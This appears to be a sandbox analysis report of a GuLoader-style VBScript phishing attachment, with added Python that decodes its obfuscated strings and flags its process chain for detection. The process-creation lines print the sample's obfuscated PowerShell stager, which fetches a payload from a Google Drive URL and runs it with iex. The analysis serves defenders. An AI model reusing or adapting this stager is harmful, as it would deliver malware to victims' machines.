';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9471C8 push esp; retf 1_2_00007FFD9B9471C9
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4607
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
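The PowerShell stage in the command line above hides every meaningful string behind its Ulnage function. The method name is assembled as 'Substrin' + 'g' in $civilisationen and called through .Invoke(), so the word Substring never appears in the command line, and each blob yields one real character per six-character group: the character at offset 5, then every sixth character after it, stopping one character before the end. $Tythed decodes to iex, so each Multiplikatorernes (Ulnage '...') call is a dot-sourced Invoke-Expression of a decoded fragment. The Python below is an added example written for this page, not code from the report or from the sample; it ports the decoder and batch-decodes four Ulnage arguments copied verbatim from the command line above ($Zootechnician, $Blikdaases93, $Timbalernes, $Tythed), recovering the User-Agent header name, a drive.google.com download URL consistent with the report's DNS and IP tables, a lone > character and iex. Two caveats: the report's HTML rendering collapsed runs of spaces inside some blobs ($unlogged, which carries the browser user agent, and $Germind, whose decoded form is the cmd.exe line above), so those decode only from the original script and not from this page; and blob lengths are assumed as printed, with the line wrap after "Tyde. " treated as report formatting rather than part of the string.

```python
"""Decoder for the string-hiding scheme in this sample's PowerShell stage.

Added example for this page; the blobs below are copied from the report's
process-creation line, everything else is written here.
"""
from __future__ import annotations

import re


def ulnage(blob: str, start: int = 5, step: int = 6, width: int = 1) -> str:
    """Python port of the sample's Ulnage function (with $Spiritusestes = 1).

    For($i = 5; $i -lt $blob.Length - 1; $i += 6) { $out += $blob.Substring($i, 1) }
    """
    out = []
    limit = len(blob) - width          # $Havnebassinet = $Roadless.Length - 1
    i = start
    while i < limit:                   # strictly less: the final character is never sampled
        out.append(blob[i:i + width])  # $Roadless.Substring($i, 1), reached via .Invoke()
        i += step
    return "".join(out)


# Matches both `$name=Ulnage '...'` assignments and bare `Ulnage '...'` arguments,
# e.g. inside Multiplikatorernes (Ulnage '...'). PowerShell names are case-insensitive.
ULNAGE_CALL = re.compile(r"(?:\$(\w+)\s*=\s*)?Ulnage\s+'([^']*)'", re.IGNORECASE)


def decode_script(script: str) -> dict[str, str]:
    """Return {variable name (or anon<N> for unnamed calls): decoded string}."""
    decoded: dict[str, str] = {}
    for n, (name, blob) in enumerate(ULNAGE_CALL.findall(script)):
        decoded[name or f"anon{n}"] = ulnage(blob)
    return decoded


# Four Ulnage arguments copied verbatim from the report's command line. The full
# line is several kilobytes and is not reproduced here; blobs whose internal runs
# of spaces were collapsed by the report's HTML rendering are deliberately left out.
REPORT_FRAGMENT = (
    "$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';"
    "$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasi"
    "Degorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/Elendu"
    "Tailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForsto"
    "Foliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL"
    " SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erD"
    "Ov.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';"
    "$Timbalernes=Ulnage 'Pa,ie> Read ';"
    "$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';"
)

if __name__ == "__main__":
    # $Blikdaases93 decodes to a drive.google.com/uc?export=download URL, which is the
    # host the report shows being resolved; $Tythed to iex; $Zootechnician to User-Agent.
    for name, value in decode_script(REPORT_FRAGMENT).items():
        print(f"{name:15s} -> {value!r}")
```

Because the regex also catches unnamed calls, running decode_script over the whole captured command line (from process telemetry or the .vbs itself) lists every Invoke-Expression payload in order, which is usually enough to read the stager without executing it.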
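The process-creation lines above are the telemetry a SOC still has when the script body itself is never captured: wscript.exe launching powershell.exe with a multi-kilobyte command line, and powershell.exe launching cmd.exe only to echo %appdata%. The following is an added example, not part of the report, that evaluates constructed Sysmon-style process events against those observations plus the $var.$method.Invoke( indirection the sample uses to hide Substring. The 1500-character threshold and the event field names are assumptions to tune to your own baseline; the constructed PowerShell event keeps the decoder prologue copied from the report's command line and pads it with an inert filler to reach the length class the report flags, since the real obfuscated strings are not reproduced here.

```python
"""Process-creation triage for the wscript -> powershell -> cmd chain in this report.

Added example for this page; events are constructed, field names are assumed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 1500  # assumption: tune to your baseline; the report's line is several KB

# `$blob.$method.Invoke(...)`: a method name kept in a variable and called via .Invoke(),
# which is how the sample calls Substring without the word appearing in the command line.
VARIABLE_METHOD_INVOKE = re.compile(r"\$\w+\.\$\w+\.Invoke\(", re.IGNORECASE)
# cmd.exe spawned by PowerShell just to expand %appdata%, as in the report.
ECHO_APPDATA = re.compile(r"\becho\s+%appdata%", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_reasons(ev: ProcessEvent) -> list[str]:
    """Return every indicator the event trips; an empty list means nothing matched."""
    parent, child = image_name(ev.parent_image), image_name(ev.image)
    reasons: list[str] = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        reasons.append("script host spawned PowerShell")
    if child in POWERSHELL and len(ev.command_line) >= LONG_CMDLINE:
        reasons.append(f"PowerShell command line of {len(ev.command_line)} chars")
    if child in POWERSHELL and VARIABLE_METHOD_INVOKE.search(ev.command_line):
        reasons.append("method name held in a variable and called via .Invoke()")
    if parent in POWERSHELL and child == "cmd.exe" and ECHO_APPDATA.search(ev.command_line):
        reasons.append("cmd.exe used by PowerShell to resolve %appdata%")
    return reasons


# Decoder prologue copied from the report's command line; the filler stands in for the
# obfuscated strings that follow it in the real sample.
PS_PROLOGUE = (
    "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';"
    "Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;"
    "For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6))"
    "{$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}"
    "$anthracolithic;}"
)
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: the report's two process creations plus one benign PowerShell launch.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS_IMAGE,
                 f'"{PS_IMAGE}" "' + PS_PROLOGUE + "$Filler=0;" * 200 + '"'),
    ProcessEvent(PS_IMAGE, r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_IMAGE,
                 f'"{PS_IMAGE}" -NoProfile Get-Date'),
]


def triage(events) -> list[tuple[str, list[str]]]:
    return [(image_name(e.image), suspicious_reasons(e)) for e in events]


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image, "->", reasons or "clean")
```

Any single indicator is noisy on its own (administrators do run long PowerShell one-liners); the report's chain trips three on the first event and a fourth on its child, so correlating by parent process within a short window is what turns this into a usable alert.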
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (numbers in parentheses are the signature-count badges shown in the report's matrix; techniques without a number are matrix placeholders that matched no signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (2 2 1); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (1 1); Exploitation for Client Execution (1); PowerShell (2); Cron; Launchd; Scheduled Task
Persistence: Scripting (2 2 1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1 1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (2 1); Process Injection (1 1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (2 1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (1 2)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (1 3); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection, submitted file:
Source | Detection | Scanner | Label
JUSTIFICANTE DE PAGO.vbs | 21% | ReversingLabs | Script-WScript.Trojan.Guloader
JUSTIFICANTE DE PAGO.vbs | 8% | Virustotal |
No Antivirus matches

Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://drive.usercontent.googh | 0% | Avira URL Cloud | safe
https://drive.googP | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.101.100 | true | false | | high
drive.usercontent.google.com | 142.251.2.132 | true | false | | high
URLs found in process memory. Only the drive.google.com and drive.usercontent.google.com entries correspond to hosts this sample actually resolved (see the Domains and IPs tables); pesterbdd.com, github.com/Pester and apache.org come from the Pester module manifest, contoso.com and nuget.org from the PowerShellGet/PackageManagement modules, and aka.ms/pscore68 and schemas.xmlsoap.org from PowerShell and .NET themselves, all of which are resident in any powershell.exe process. The "malware" verdict on Pester.png is therefore a reputation-feed artifact, not evidence of contact.
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
https://www.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe: 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.usercontent.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe: 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe: 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe: 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe: 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe: 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe: 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe: 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.googP | powershell.exe: 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.googh | powershell.exe: 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe: 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe: 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe: 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe: 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp | false | | high
IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
142.251.2.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.101.100 | drive.google.com | United States | 15169 | GOOGLEUS | false
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430768
                              Start date and time:2024-04-24 07:01:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:JUSTIFICANTE DE PAGO.vbs
                              Detection:MAL
                              Classification:mal100.expl.evad.winVBS@6/4@2/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 75%
                              • Number of executed functions: 4
                              • Number of non-executed functions: 1
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:01:59 | API Interceptor | 43x Sleep call for process: powershell.exe modified
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | orden de compra.vbs | malicious | AgentTesla | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | DHL Shipping doc.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | Reconfirm Details.vbs | malicious | AgentTesla | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | purchase order pdf.exe | malicious | AgentTesla | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | PO 23JC0704-Rollease-B.exe | malicious | AgentTesla | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | 3Shape Unite Installer.exe | malicious | Unknown | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | ScreenConnect.Client.exe | malicious | ScreenConnect Tool | 142.251.2.132, 142.250.101.100
3b5074b1b5d032e5620f69f9f700ff0e | ScreenConnect.Client.exe | malicious | ScreenConnect Tool | 142.251.2.132, 142.250.101.100
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllul/nq/llh:NllUyt
                              MD5:AB80AD9A08E5B16132325DF5584B2CBE
                              SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                              SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                              SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e................................................@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                              Category:dropped
                              Size (bytes):1692
                              Entropy (8bit):5.0933355420416335
                              Encrypted:false
                              SSDEEP:24:hazspvlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pNmRq+fjsueFYaWJ
                              MD5:387CA26099C583D5E8857987F73D894B
                              SHA1:D1790C9613E35DD5F3AB26B04A898C01D1EED909
                              SHA-256:429FD395965858473A411E8B891F8541DAD7AC0032B2A18530AC913D68703F6D
                              SHA-512:59E0775A443645E98D2BAE03FD47F571BBBF76DD3B6B473234E49495C38AA34D7DBEC75FF6D1A1A153A0F0B79EACAE69034CB25AB75B2F138CCAEFD3F0AE4FA7
                              Malicious:false
                              Reputation:low
